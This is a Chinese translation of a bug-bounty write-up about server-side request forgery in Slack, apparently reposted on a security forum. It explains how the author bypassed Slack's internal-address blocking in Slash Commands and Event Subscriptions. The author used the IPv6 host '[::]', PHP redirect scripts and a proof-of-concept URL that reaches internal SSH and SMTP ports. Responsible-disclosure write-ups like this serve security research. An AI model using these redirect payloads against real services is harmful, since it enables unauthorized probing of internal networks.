在开始之前,对于任何从BugBounty开始的人来说,我有两个重要提示。

1:始终检查以前的报告,您可能知道在这种情况下可能有效的旁路,或者您可以学习新的东西。

2:如果您喜欢有关Bug Bounty或其他黑客相关内容的内容,请注册我的频道并关注新帖子。

SLACK和SSRF:

Slack是一个协作中心,它将合适的人员,信息和工具结合在一起,以完成工作。从财富100强公司到角落市场,全球数百万人使用Slack连接他们的团队,统一他们的系统,推动业务发展。

斜杠命令 Slash Commands

“api.slack.com中的SSRF,使用斜杠命令并绕过保护措施。”

您可以在此处了解有关Slash Commands的更多信息:

“一些Slack功能,如”Integrations / Phabricator“和”Integration / Slash Commands“允许用户提交将由后端服务器访问的URL。黑名单试图禁止访问内部资源(loopback,10.0.0.0 / 8,192.168.0.0 / 24,...)。可以使用“[::]”作为主机名绕过此黑名单。只有使用该向量才能到达绑定所有接口和支持IPv6的服务。“

Slack已禁用在Slash命令中注册IPV6地址的选项。

slacka:' 我为ipv6阻止创建了一个新问题,并与我们的工程师一起升级了案例。当我们有更新时,我会通知你。'

对他们来说,一个修复,对我来说,一个旁路。

为了绕过这种新的保护,我在PHP中使用了带有“Location”标题的重定向。

在您自己的域中:index.php

<?php
 header("location: http://[::]:22/");
 ?>

location: http://[::]:22/
并保存。
转到你的Slack并输入/ youslash
试试我的服务器http:// hackerserver [。] com /

结果
:22

:25

7月13日 - 第一回应
7月18日 - Tri CC
于1月23日 - Slack以500美元的奖金奖励了elber。

在找到此绕过之后,我在Slack中寻找了更多漏洞,并找到了Event Subscriptions参数。

“在事件订阅参数中绕过SSRF保护。”

该漏洞出现在“事件订阅”参数中,其中:
“ Your app can subscribe to be notified of events in Slack (for example, when a user adds a reaction or creates a file) at a URL you choose.”。
URL:https://api.slack.com/apps/YOUAPPCODE/event-subscriptions?

当我们添加不符合API标准的网站时,我们会收到以下消息:

Your request URL gave us a 500 error. Update your URL to receive a new request and challenge value.

使用IPV6向量旁路[::]。

在我的host上,x.php有:

<?php
header("location: ".$_GET['u']);
?>

PoC:
http://hacker.site/x.php/?u=http://%5B::%5D:22/

Response:
SSH [::]:22

SMTP [::]:25

这份报告Slack被选为另一个SSRF的副本,我坚持说他们把我作为另一个报告的参与者。

我看到另一份报告与我的不同,所以我告诉团队他们可能是错的。

参考文献:
https://hackerone.com/reports/61312

(报告将于02/22在Hackerone上公开披露)

https://hackerone.com/reports/381129

https://hackerone.com/reports/386292

原文地址:https://medium.com/@elberandre/1-000-ssrf-in-slack-7737935d3884

点击收藏 | 1 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖